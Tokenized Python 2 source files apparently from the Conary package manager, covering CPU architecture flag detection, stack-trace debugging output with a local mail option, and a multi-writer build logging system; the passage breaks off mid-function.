<s> from conary . deps import deps <EOL> import os <EOL> def x86flags ( archTag , baseArch , extraFlags , ofInterest ) : <EOL> try : <EOL> lines = open ( "<STR_LIT>" ) . read ( ) . split ( "<STR_LIT:\n>" ) <EOL> except IOError : <EOL> lines = [ ] <EOL> rc = [ ( x , deps . FLAG_SENSE_PREFERRED ) for x in extraFlags ] <EOL> for line in lines : <EOL> if not line . startswith ( "<STR_LIT>" ) : continue <EOL> fields = line . split ( ) <EOL> if fields [ <NUM_LIT:0> ] != "<STR_LIT>" : continue <EOL> for flag in fields [ <NUM_LIT:2> : ] : <EOL> if ofInterest . has_key ( flag ) : <EOL> rc . append ( ( flag , deps . FLAG_SENSE_PREFERRED ) ) <EOL> return deps . Dependency ( archTag , rc ) <EOL> return deps . Dependency ( archTag ) <EOL> def flags_ix86 ( baseArch ) : <EOL> baseFlagMap = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> i = baseFlagMap . index ( baseArch ) <EOL> ofInterest = { } . fromkeys ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return [ [ x86flags ( '<STR_LIT>' , baseArch , baseFlagMap [ i : ] , ofInterest ) ] ] <EOL> def flags_i686 ( ) : <EOL> return flags_ix86 ( baseArch = '<STR_LIT>' ) <EOL> def flags_i586 ( ) : <EOL> return flags_ix86 ( baseArch = '<STR_LIT>' ) <EOL> def flags_mips64 ( ) : <EOL> return [ [ deps . Dependency ( '<STR_LIT>' , [ ( '<STR_LIT>' , deps . FLAG_SENSE_REQUIRED ) ] ) ] ] <EOL> def flags_x86_64 ( ) : <EOL> baseFlagMap = [ ] <EOL> ofInterest = { } . fromkeys ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> x86_64 = x86flags ( '<STR_LIT>' , baseArch , baseFlagMap , ofInterest ) <EOL> multiarch = flags_i686 ( ) <EOL> multiarch [ <NUM_LIT:0> ] . 
append ( x86_64 ) <EOL> return multiarch <EOL> def current ( ) : <EOL> return currentArch <EOL> def any ( ) : <EOL> return "<STR_LIT>" <EOL> def canInstall ( other ) : <EOL> return other == "<STR_LIT>" or other == currentArch <EOL> def initializeArch ( ) : <EOL> global currentArch <EOL> localNamespace = globals ( ) <EOL> if localNamespace . has_key ( "<STR_LIT>" + baseArch ) : <EOL> currentArch = localNamespace [ "<STR_LIT>" + baseArch ] ( ) <EOL> del localNamespace <EOL> baseArch = os . uname ( ) [ <NUM_LIT:4> ] <EOL> currentArch = [ [ deps . Dependency ( baseArch ) ] ] <EOL> initializeArch ( ) <EOL> class FlavorPreferences : <EOL> @ staticmethod <EOL> def _getCurrentArchIS ( arch ) : <EOL> return '<STR_LIT:U+0020>' . join ( sorted ( dep . name for dep in arch [ <NUM_LIT:0> ] ) ) <EOL> flavorPreferences = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> @ staticmethod <EOL> def getStringFlavorPreferences ( arch ) : <EOL> key = FlavorPreferences . _getCurrentArchIS ( arch ) <EOL> return FlavorPreferences . flavorPreferences . get ( key , [ ] ) <EOL> @ staticmethod <EOL> def getFlavorPreferences ( arch ) : <EOL> return [ deps . parseFlavor ( x ) <EOL> for x in FlavorPreferences . getStringFlavorPreferences ( arch ) ] <EOL> def getFlavorPreferences ( arch = currentArch ) : <EOL> return FlavorPreferences . getFlavorPreferences ( arch ) <EOL> class IncompatibleInstructionSets ( Exception ) : <EOL> def __init__ ( self , is1 , is2 ) : <EOL> Exception . __init__ ( self ) <EOL> self . is1 = is1 <EOL> self . is2 = is2 <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . is1 , self . 
is2 ) <EOL> def getFlavorPreferencesFromFlavor ( depSet ) : <EOL> arch = getMajorArch ( depSet . iterDepsByClass ( deps . InstructionSetDependency ) ) <EOL> if arch is None : <EOL> return None <EOL> return getFlavorPreferences ( [ [ arch ] ] ) <EOL> def getMajorArch ( depList ) : <EOL> """<STR_LIT>""" <EOL> majorArch = None <EOL> depList = list ( depList ) <EOL> if not depList : <EOL> return None <EOL> if len ( depList ) == <NUM_LIT:1> : <EOL> return depList [ <NUM_LIT:0> ] <EOL> for dep in depList : <EOL> prefs = set ( getFlavorPreferences ( [ [ dep ] ] ) ) <EOL> if not prefs : <EOL> continue <EOL> majorArch = dep <EOL> prefArches = set ( ) <EOL> for depSet in prefs : <EOL> for dep in depSet . iterDepsByClass ( deps . InstructionSetDependency ) : <EOL> prefArches . add ( dep . name ) <EOL> break <EOL> if not majorArch : <EOL> raise IncompatibleInstructionSets ( depList [ <NUM_LIT:0> ] . name , depList [ <NUM_LIT:1> ] ) <EOL> for dep in depList : <EOL> if dep . name != majorArch . name and getFlavorPreferences ( [ [ dep ] ] ) : <EOL> raise IncompatibleInstructionSets ( majorArch . name , dep ) <EOL> elif dep . name not in prefArches : <EOL> raise IncompatibleInstructionSets ( majorArch . name , dep ) <EOL> return majorArch </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import smtplib <EOL> import sys <EOL> import string <EOL> import tempfile <EOL> import traceback <EOL> import xmlrpclib <EOL> from repr import Repr <EOL> _repr = Repr ( ) <EOL> _repr . maxstring = <NUM_LIT> <EOL> _saferepr = _repr . repr <EOL> def printTraceBack ( tb = None , output = sys . stderr , exc_type = None , exc_msg = None ) : <EOL> if isinstance ( output , str ) : <EOL> output = open ( output , '<STR_LIT:w>' ) <EOL> exc_info = sys . exc_info ( ) <EOL> if tb is None : <EOL> tb = exc_info [ <NUM_LIT:2> ] <EOL> if exc_type is None : <EOL> exc_type = exc_info [ <NUM_LIT:0> ] <EOL> if exc_msg is None : <EOL> exc_msg = exc_info [ <NUM_LIT:1> ] <EOL> if exc_type is not None : <EOL> output . write ( '<STR_LIT>' ) <EOL> exc_info = '<STR_LIT:\n>' . join ( traceback . format_exception_only ( exc_type , exc_msg ) ) <EOL> output . write ( exc_info ) <EOL> output . write ( '<STR_LIT>' ) <EOL> lines = traceback . format_exception ( exc_type , exc_msg , tb ) <EOL> output . write ( string . joinfields ( lines , "<STR_LIT>" ) ) <EOL> while tb : <EOL> _printFrame ( tb . tb_frame , output = output ) <EOL> tb = tb . tb_next <EOL> def printFrame ( frame = <NUM_LIT:0> , output = sys . stderr ) : <EOL> if isinstance ( output , str ) : <EOL> output = open ( output , '<STR_LIT:w>' ) <EOL> if isinstance ( frame , int ) : <EOL> frame = sys . _getframe ( frame + <NUM_LIT:1> ) <EOL> _printFrame ( frame , output ) <EOL> def printStack ( frame = <NUM_LIT:0> , output = sys . stderr ) : <EOL> if isinstance ( output , str ) : <EOL> output = open ( output , '<STR_LIT:w>' ) <EOL> if isinstance ( frame , int ) : <EOL> frame = sys . _getframe ( frame + <NUM_LIT:1> ) <EOL> while ( frame ) : <EOL> output . write ( "<STR_LIT>" ) <EOL> _printFrame ( frame , output ) <EOL> frame = frame . f_back <EOL> def mailStack ( frame , recips , sender , subject , extracontent = None ) : <EOL> file = tempfile . TemporaryFile ( ) <EOL> file . 
write ( '<STR_LIT>' + subject + '<STR_LIT>' ) <EOL> if extracontent : <EOL> file . write ( extracontent ) <EOL> printStack ( frame , file ) <EOL> server = smtplib . SMTP ( '<STR_LIT:localhost>' ) <EOL> file . seek ( <NUM_LIT:0> ) <EOL> server . sendmail ( sender , <EOL> recips , <EOL> file . read ( ) ) <EOL> server . close ( ) <EOL> file . close ( ) <EOL> def _printFrame ( f , output = sys . stderr ) : <EOL> c = f . f_code <EOL> argcount = c . co_argcount <EOL> varnames = c . co_varnames <EOL> args = varnames [ : argcount ] <EOL> locals = f . f_locals <EOL> globals = f . f_globals <EOL> output . write ( "<STR_LIT>" % ( c . co_filename , f . f_lineno , globals [ '<STR_LIT>' ] , c . co_name , '<STR_LIT:U+002CU+0020>' . join ( args ) ) ) <EOL> localkeys = [ l for l in f . f_locals . keys ( ) if not inspect . ismodule ( locals [ l ] ) ] <EOL> if argcount > <NUM_LIT:0> : <EOL> output . write ( "<STR_LIT>" ) <EOL> for var in varnames [ : argcount ] : <EOL> if var in locals : <EOL> val = locals [ var ] <EOL> val = _getStringValue ( val ) <EOL> localkeys . remove ( var ) <EOL> else : <EOL> val = '<STR_LIT>' <EOL> output . write ( "<STR_LIT>" % ( var , _saferepr ( val ) ) ) <EOL> for hidden in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if hidden in localkeys : <EOL> localkeys . remove ( hidden ) <EOL> localkeys . sort ( ) <EOL> if localkeys : <EOL> output . write ( "<STR_LIT>" ) <EOL> for key in localkeys : <EOL> if key in locals : <EOL> val = locals [ key ] <EOL> val = _getStringValue ( val ) <EOL> else : <EOL> val = '<STR_LIT>' <EOL> output . write ( "<STR_LIT>" % ( key , _saferepr ( val ) ) ) <EOL> def _getStringValue ( val ) : <EOL> try : <EOL> if isinstance ( val , xmlrpclib . ServerProxy ) : <EOL> rval = "<STR_LIT>" <EOL> elif hasattr ( val , '<STR_LIT>' ) : <EOL> rval = val . asString ( ) <EOL> elif inspect . isclass ( val ) : <EOL> rval = '<STR_LIT>' % ( val . __module__ , val . 
__name__ ) <EOL> elif not hasattr ( val , '<STR_LIT>' ) : <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> rval = '<STR_LIT>' % val . __class__ <EOL> else : <EOL> rval = '<STR_LIT>' <EOL> else : <EOL> rval = val <EOL> return rval <EOL> except Exception , e : <EOL> try : <EOL> return '<STR_LIT>' % ( repr ( val ) , e ) <EOL> except Exception , e : <EOL> return '<STR_LIT>' % ( e ) </s>
<s> import base64 <EOL> import bz2 <EOL> import errno <EOL> import gzip <EOL> import os <EOL> import re <EOL> import select <EOL> import signal <EOL> import struct <EOL> import sys <EOL> import threading <EOL> import time <EOL> from xml . sax import saxutils <EOL> from conary . errors import ConaryError <EOL> try : <EOL> import fcntl <EOL> import termios <EOL> import tty <EOL> except ImportError : <EOL> fcntl = termios = tty = None <EOL> BUFFER = <NUM_LIT> * <NUM_LIT> <EOL> MARKER , FREETEXT , NEWLINE , CARRIAGE_RETURN , COMMAND , CLOSE = range ( <NUM_LIT:6> ) <EOL> LINEBREAKS = ( '<STR_LIT:\r>' , '<STR_LIT:\n>' ) <EOL> def callable ( func ) : <EOL> func . _callable = True <EOL> return func <EOL> def makeRecord ( d ) : <EOL> res = "<STR_LIT>" <EOL> for key , val in sorted ( d . iteritems ( ) ) : <EOL> res += "<STR_LIT>" % ( key , val , key ) <EOL> res += "<STR_LIT>" <EOL> return res <EOL> def getTime ( ) : <EOL> """<STR_LIT>""" <EOL> curTime = time . time ( ) <EOL> msecs = <NUM_LIT:1000> * ( curTime - long ( curTime ) ) <EOL> fmtStr = "<STR_LIT>" <EOL> return time . strftime ( fmtStr , time . gmtime ( curTime ) ) % msecs <EOL> def openPath ( path ) : <EOL> class BZ2File ( bz2 . BZ2File ) : <EOL> def flush ( self ) : <EOL> pass <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> return BZ2File ( path , '<STR_LIT:w>' ) <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> return gzip . GzipFile ( path , '<STR_LIT:w>' ) <EOL> return open ( path , '<STR_LIT:w>' ) <EOL> class Lexer ( object ) : <EOL> def __init__ ( self , marker , callbacks = None ) : <EOL> self . marker = marker <EOL> self . callbacks = callbacks or [ ] <EOL> self . stream = '<STR_LIT>' <EOL> self . mark = False <EOL> self . markMatch = '<STR_LIT>' <EOL> self . state = FREETEXT <EOL> def registerCallback ( self , callback ) : <EOL> self . callbacks . append ( callback ) <EOL> def freetext ( self , text ) : <EOL> self . emit ( ( FREETEXT , text ) ) <EOL> def newline ( self ) : <EOL> self . 
emit ( ( NEWLINE , None ) ) <EOL> def carriageReturn ( self ) : <EOL> self . emit ( ( CARRIAGE_RETURN , None ) ) <EOL> def command ( self , text ) : <EOL> self . emit ( ( COMMAND , text . split ( None , <NUM_LIT:1> ) ) ) <EOL> def close ( self ) : <EOL> if self . state == NEWLINE : <EOL> self . newline ( ) <EOL> self . emit ( ( CLOSE , None ) ) <EOL> def scan ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> for char in sequence : <EOL> if self . state == FREETEXT : <EOL> if char in LINEBREAKS : <EOL> if self . stream : <EOL> self . freetext ( self . stream ) <EOL> self . stream = '<STR_LIT>' <EOL> if char == '<STR_LIT:\n>' : <EOL> self . state = NEWLINE <EOL> else : <EOL> self . carriageReturn ( ) <EOL> else : <EOL> self . stream += char <EOL> elif self . state == NEWLINE : <EOL> if char in LINEBREAKS : <EOL> self . newline ( ) <EOL> self . stream = '<STR_LIT>' <EOL> if char == '<STR_LIT:\r>' : <EOL> self . carriageReturn ( ) <EOL> self . state = FREETEXT <EOL> else : <EOL> if self . marker . startswith ( char ) : <EOL> self . stream = char <EOL> self . state = MARKER <EOL> else : <EOL> self . newline ( ) <EOL> self . stream = char <EOL> self . state = FREETEXT <EOL> elif self . state == MARKER : <EOL> if char in LINEBREAKS : <EOL> self . newline ( ) <EOL> if self . stream : <EOL> self . freetext ( self . stream ) <EOL> self . stream = '<STR_LIT>' <EOL> if char == '<STR_LIT:\r>' : <EOL> self . carriageReturn ( ) <EOL> self . state = FREETEXT <EOL> else : <EOL> self . state = NEWLINE <EOL> else : <EOL> candidate = self . stream + char <EOL> self . stream += char <EOL> if self . stream == self . marker : <EOL> self . stream = '<STR_LIT>' <EOL> self . state = COMMAND <EOL> else : <EOL> if not self . marker . startswith ( candidate ) : <EOL> self . newline ( ) <EOL> self . state = FREETEXT <EOL> elif self . state == COMMAND : <EOL> if char == '<STR_LIT:\n>' : <EOL> self . command ( self . stream . lstrip ( ) ) <EOL> self . stream = '<STR_LIT>' <EOL> self . 
state = FREETEXT <EOL> else : <EOL> self . stream += char <EOL> if self . state == FREETEXT : <EOL> if self . stream : <EOL> self . freetext ( self . stream ) <EOL> self . stream = '<STR_LIT>' <EOL> def write ( self , text ) : <EOL> return self . scan ( text ) <EOL> def flush ( self ) : <EOL> self . scan ( '<STR_LIT>' ) <EOL> def emit ( self , token ) : <EOL> for callback in self . callbacks : <EOL> callback ( token ) <EOL> class LogWriter ( object ) : <EOL> def handleToken ( self , token ) : <EOL> mode , param = token <EOL> if mode == FREETEXT : <EOL> self . freetext ( param ) <EOL> elif mode == NEWLINE : <EOL> self . newline ( ) <EOL> elif mode == CARRIAGE_RETURN : <EOL> self . carriageReturn ( ) <EOL> elif mode == COMMAND : <EOL> self . command ( * param ) <EOL> elif mode == CLOSE : <EOL> self . close ( ) <EOL> def freetext ( self , text ) : <EOL> pass <EOL> def write ( self , text ) : <EOL> return self . freetext ( text ) <EOL> def flush ( self ) : <EOL> pass <EOL> def newline ( self ) : <EOL> pass <EOL> def carriageReturn ( self ) : <EOL> pass <EOL> def start ( self ) : <EOL> pass <EOL> @ callable <EOL> def reportMissingBuildRequires ( self , data ) : <EOL> self . freetext ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( data . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> self . newline ( ) <EOL> @ callable <EOL> def reportExcessBuildRequires ( self , data ) : <EOL> self . freetext ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( data . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> self . newline ( ) <EOL> @ callable <EOL> def reportExcessSuperclassBuildRequires ( self , data ) : <EOL> self . freetext ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( data . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> self . newline ( ) <EOL> def command ( self , cmd , * args ) : <EOL> func = getattr ( self . __class__ , cmd , False ) <EOL> if func and func . __dict__ . get ( '<STR_LIT>' , False ) : <EOL> try : <EOL> return func ( self , * args ) <EOL> except TypeError : <EOL> self . 
freetext ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( cmd , repr ( args ) ) ) <EOL> except Exception , e : <EOL> self . freetext ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> str ( e . __class__ ) , str ( e ) , cmd , repr ( args ) ) ) <EOL> def close ( self ) : <EOL> pass <EOL> class XmlLogWriter ( LogWriter ) : <EOL> def __init__ ( self , path ) : <EOL> self . data = threading . local ( ) <EOL> self . messageId = <NUM_LIT:0> <EOL> self . path = path <EOL> self . logging = False <EOL> self . text = '<STR_LIT>' <EOL> self . stream = None <EOL> LogWriter . __init__ ( self ) <EOL> def flush ( self ) : <EOL> self . stream . flush ( ) <EOL> def start ( self ) : <EOL> self . stream = openPath ( self . path ) <EOL> print >> self . stream , '<STR_LIT>' <EOL> print >> self . stream , "<STR_LIT>" <EOL> self . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . stream . flush ( ) <EOL> self . logging = True <EOL> def _getDescriptorStack ( self ) : <EOL> if not hasattr ( self . data , '<STR_LIT>' ) : <EOL> self . data . descriptorStack = [ ] <EOL> return self . data . descriptorStack <EOL> def _getRecordData ( self ) : <EOL> if not hasattr ( self . data , '<STR_LIT>' ) : <EOL> self . data . recordData = { } <EOL> return self . data . recordData <EOL> def close ( self ) : <EOL> if not self . logging : <EOL> return <EOL> del self . _getDescriptorStack ( ) [ : ] <EOL> self . _getRecordData ( ) . clear ( ) <EOL> self . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> print >> self . stream , "<STR_LIT>" <EOL> self . stream . flush ( ) <EOL> self . stream . close ( ) <EOL> def freetext ( self , text ) : <EOL> self . text += text <EOL> def newline ( self ) : <EOL> if self . text : <EOL> self . log ( self . text ) <EOL> self . text = '<STR_LIT>' <EOL> carriageReturn = newline <EOL> def _getDescriptor ( self ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> return '<STR_LIT:.>' . join ( descriptorStack ) <EOL> def log ( self , message , levelname = '<STR_LIT>' ) : <EOL> message = saxutils . 
escape ( message ) <EOL> message = message . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> macros = { } <EOL> recordData = self . _getRecordData ( ) <EOL> macros . update ( recordData ) <EOL> macros [ '<STR_LIT:time>' ] = getTime ( ) <EOL> macros [ '<STR_LIT:message>' ] = message <EOL> macros [ '<STR_LIT>' ] = levelname <EOL> macros [ '<STR_LIT>' ] = os . getpid ( ) <EOL> threadName = threading . currentThread ( ) . getName ( ) <EOL> if threadName != '<STR_LIT>' : <EOL> macros [ '<STR_LIT>' ] = threadName <EOL> macros [ '<STR_LIT>' ] = self . messageId <EOL> self . messageId += <NUM_LIT:1> <EOL> descriptor = self . _getDescriptor ( ) <EOL> if descriptor : <EOL> macros [ '<STR_LIT>' ] = descriptor <EOL> print >> self . stream , makeRecord ( macros ) <EOL> @ callable <EOL> def pushDescriptor ( self , descriptor ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> descriptorStack . append ( descriptor ) <EOL> @ callable <EOL> def popDescriptor ( self , descriptor = None ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> desc = descriptorStack . pop ( ) <EOL> if descriptor : <EOL> assert descriptor == desc <EOL> return desc <EOL> @ callable <EOL> def addRecordData ( self , * args ) : <EOL> if not args : <EOL> return <EOL> if len ( args ) < <NUM_LIT:2> : <EOL> key , val = args [ <NUM_LIT:0> ] . split ( None , <NUM_LIT:1> ) <EOL> else : <EOL> key , val = args <EOL> if key [ <NUM_LIT:0> ] . isdigit ( ) or not re . match ( '<STR_LIT>' , key , <EOL> flags = re . LOCALE | re . UNICODE ) : <EOL> raise RuntimeError ( "<STR_LIT>" % key ) <EOL> if isinstance ( val , ( str , unicode ) ) : <EOL> val = saxutils . escape ( val ) <EOL> recordData = self . _getRecordData ( ) <EOL> recordData [ key ] = val <EOL> @ callable <EOL> def delRecordData ( self , key ) : <EOL> recordData = self . _getRecordData ( ) <EOL> recordData . pop ( key , None ) <EOL> @ callable <EOL> def reportMissingBuildRequires ( self , data ) : <EOL> self . 
pushDescriptor ( '<STR_LIT>' ) <EOL> self . log ( data , levelname = '<STR_LIT>' ) <EOL> self . popDescriptor ( '<STR_LIT>' ) <EOL> @ callable <EOL> def reportExcessBuildRequires ( self , data ) : <EOL> self . pushDescriptor ( '<STR_LIT>' ) <EOL> self . log ( data , levelname = '<STR_LIT>' ) <EOL> self . popDescriptor ( '<STR_LIT>' ) <EOL> @ callable <EOL> def reportExcessSuperclassBuildRequires ( self , data ) : <EOL> self . pushDescriptor ( '<STR_LIT>' ) <EOL> self . log ( data , levelname = '<STR_LIT>' ) <EOL> self . popDescriptor ( '<STR_LIT>' ) <EOL> class FileLogWriter ( LogWriter ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . stream = None <EOL> LogWriter . __init__ ( self ) <EOL> self . logging = False <EOL> def start ( self ) : <EOL> self . stream = openPath ( self . path ) <EOL> self . logging = True <EOL> def freetext ( self , text ) : <EOL> if self . logging : <EOL> self . stream . write ( text ) <EOL> self . stream . flush ( ) <EOL> def newline ( self ) : <EOL> if self . logging : <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . stream . flush ( ) <EOL> carriageReturn = newline <EOL> def close ( self ) : <EOL> self . stream . close ( ) <EOL> self . logging = False <EOL> class StreamLogWriter ( LogWriter ) : <EOL> def __init__ ( self , stream = None ) : <EOL> self . data = threading . local ( ) <EOL> self . data . hideLog = False <EOL> self . stream = stream <EOL> LogWriter . __init__ ( self ) <EOL> self . index = <NUM_LIT:0> <EOL> self . closed = bool ( self . stream ) <EOL> def start ( self ) : <EOL> if not self . stream : <EOL> self . stream = sys . stdout <EOL> def freetext ( self , text ) : <EOL> if not self . data . __dict__ . get ( '<STR_LIT>' ) : <EOL> self . stream . write ( text ) <EOL> self . stream . flush ( ) <EOL> self . index += len ( text ) <EOL> def newline ( self ) : <EOL> if not self . data . __dict__ . get ( '<STR_LIT>' ) : <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . stream . 
flush ( ) <EOL> self . index = <NUM_LIT:0> <EOL> def carriageReturn ( self ) : <EOL> if not self . data . __dict__ . get ( '<STR_LIT>' ) : <EOL> if ( self . index % <NUM_LIT> ) : <EOL> spaces = <NUM_LIT> - ( self . index % <NUM_LIT> ) <EOL> self . stream . write ( spaces * '<STR_LIT:U+0020>' ) <EOL> self . stream . write ( '<STR_LIT:\r>' ) <EOL> self . stream . flush ( ) <EOL> self . index = <NUM_LIT:0> <EOL> @ callable <EOL> def pushDescriptor ( self , descriptor ) : <EOL> if descriptor == '<STR_LIT>' : <EOL> self . data . hideLog = True <EOL> @ callable <EOL> def popDescriptor ( self , descriptor = None ) : <EOL> if descriptor is None : <EOL> return <EOL> if descriptor == '<STR_LIT>' : <EOL> self . data . hideLog = False <EOL> @ callable <EOL> def reportExcessSuperclassBuildRequires ( self , data ) : <EOL> pass <EOL> class SubscriptionLogWriter ( LogWriter ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . stream = None <EOL> LogWriter . __init__ ( self ) <EOL> self . logging = False <EOL> self . current = None <EOL> self . rePatternList = [ ] <EOL> self . r = None <EOL> @ callable <EOL> def subscribe ( self , pattern ) : <EOL> self . rePatternList . append ( pattern ) <EOL> self . r = re . compile ( '<STR_LIT>' % '<STR_LIT:|>' . join ( self . rePatternList ) ) <EOL> @ callable <EOL> def synchronizeMark ( self , timestamp ) : <EOL> if self . current : <EOL> self . newline ( forceNewline = True ) <EOL> self . stream . write ( timestamp ) <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . stream . flush ( ) <EOL> def start ( self ) : <EOL> self . stream = file ( self . path , '<STR_LIT:a>' ) <EOL> self . logging = True <EOL> def freetext ( self , text ) : <EOL> if self . current : <EOL> self . current += text <EOL> else : <EOL> self . current = text <EOL> def newline ( self , forceNewline = False ) : <EOL> if self . current : <EOL> if self . current [ - <NUM_LIT:1> ] == '<STR_LIT:\\>' : <EOL> self . current = self . current . 
rstrip ( '<STR_LIT:\\>' ) <EOL> if not forceNewline : <EOL> return <EOL> if self . r and self . r . match ( self . current ) : <EOL> self . stream . write ( self . current ) <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . current = None <EOL> carriageReturn = newline <EOL> def close ( self ) : <EOL> self . stream . close ( ) <EOL> self . logging = False <EOL> def startLog ( path , xmlPath , subscribeLogPath , withStdin = True ) : <EOL> """<STR_LIT>""" <EOL> plainWriter = FileLogWriter ( path ) <EOL> xmlWriter = XmlLogWriter ( xmlPath ) <EOL> screenWriter = StreamLogWriter ( ) <EOL> subscriptionWriter = SubscriptionLogWriter ( subscribeLogPath ) <EOL> file ( subscribeLogPath , '<STR_LIT:a>' ) <EOL> lgr = Logger ( withStdin = withStdin , <EOL> writers = [ plainWriter , xmlWriter , <EOL> screenWriter , subscriptionWriter ] , <EOL> syncPath = subscribeLogPath ) <EOL> lgr . startLog ( ) <EOL> return lgr <EOL> def escapeMessage ( msg ) : <EOL> assert ( '<STR_LIT>' not in msg ) <EOL> msg = msg . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> msg . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> return msg <EOL> def unescapeMessage ( msg ) : <EOL> msg = msg . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> msg = msg . replace ( '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> msg = msg . replace ( '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> return msg <EOL> class Logger : <EOL> def __init__ ( self , withStdin = True , writers = [ ] , syncPath = None ) : <EOL> if not termios : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . marker = base64 . b64encode ( os . urandom ( <NUM_LIT> ) ) <EOL> self . lexer = Lexer ( self . marker ) <EOL> for writer in writers : <EOL> self . lexer . registerCallback ( writer . handleToken ) <EOL> self . writers = writers <EOL> self . syncPath = syncPath <EOL> self . logging = False <EOL> self . closed = False <EOL> self . withStdin = withStdin <EOL> self . data = threading . 
local ( ) <EOL> def _getDescriptorStack ( self ) : <EOL> if not hasattr ( self . data , '<STR_LIT>' ) : <EOL> self . data . descriptorStack = [ ] <EOL> return self . data . descriptorStack <EOL> def directLog ( self , msg ) : <EOL> self . command ( "<STR_LIT>" % escapeMessage ( msg ) ) <EOL> def command ( self , cmdStr ) : <EOL> sys . stdout . flush ( ) <EOL> sys . stderr . flush ( ) <EOL> msg = "<STR_LIT>" % ( self . marker , cmdStr ) <EOL> os . write ( sys . stdout . fileno ( ) , msg ) <EOL> def write ( self , * msgs ) : <EOL> for msg in msgs : <EOL> os . write ( sys . stdout . fileno ( ) , msg ) <EOL> def flush ( self ) : <EOL> sys . stdout . flush ( ) <EOL> def pushDescriptor ( self , descriptor ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> descriptorStack . append ( descriptor ) <EOL> self . command ( "<STR_LIT>" % descriptor ) <EOL> def popDescriptor ( self , descriptor = None ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> if descriptor : <EOL> if not descriptorStack : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( descriptor , ) ) <EOL> stackTop = descriptorStack [ - <NUM_LIT:1> ] <EOL> if descriptor != stackTop : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( stackTop , descriptor ) ) <EOL> descriptorStack . pop ( ) <EOL> self . command ( "<STR_LIT>" % descriptor ) <EOL> return stackTop <EOL> self . command ( "<STR_LIT>" ) <EOL> return None <EOL> def addRecordData ( self , key , val ) : <EOL> self . command ( '<STR_LIT>' % ( key , val ) ) <EOL> def delRecordData ( self , key ) : <EOL> self . command ( '<STR_LIT>' % key ) <EOL> def subscribe ( self , pattern ) : <EOL> self . command ( '<STR_LIT>' % pattern ) <EOL> def reportMissingBuildRequires ( self , reqList ) : <EOL> self . command ( '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( reqList ) ) <EOL> def reportExcessBuildRequires ( self , reqList ) : <EOL> self . command ( '<STR_LIT>' % '<STR_LIT:U+0020>' . 
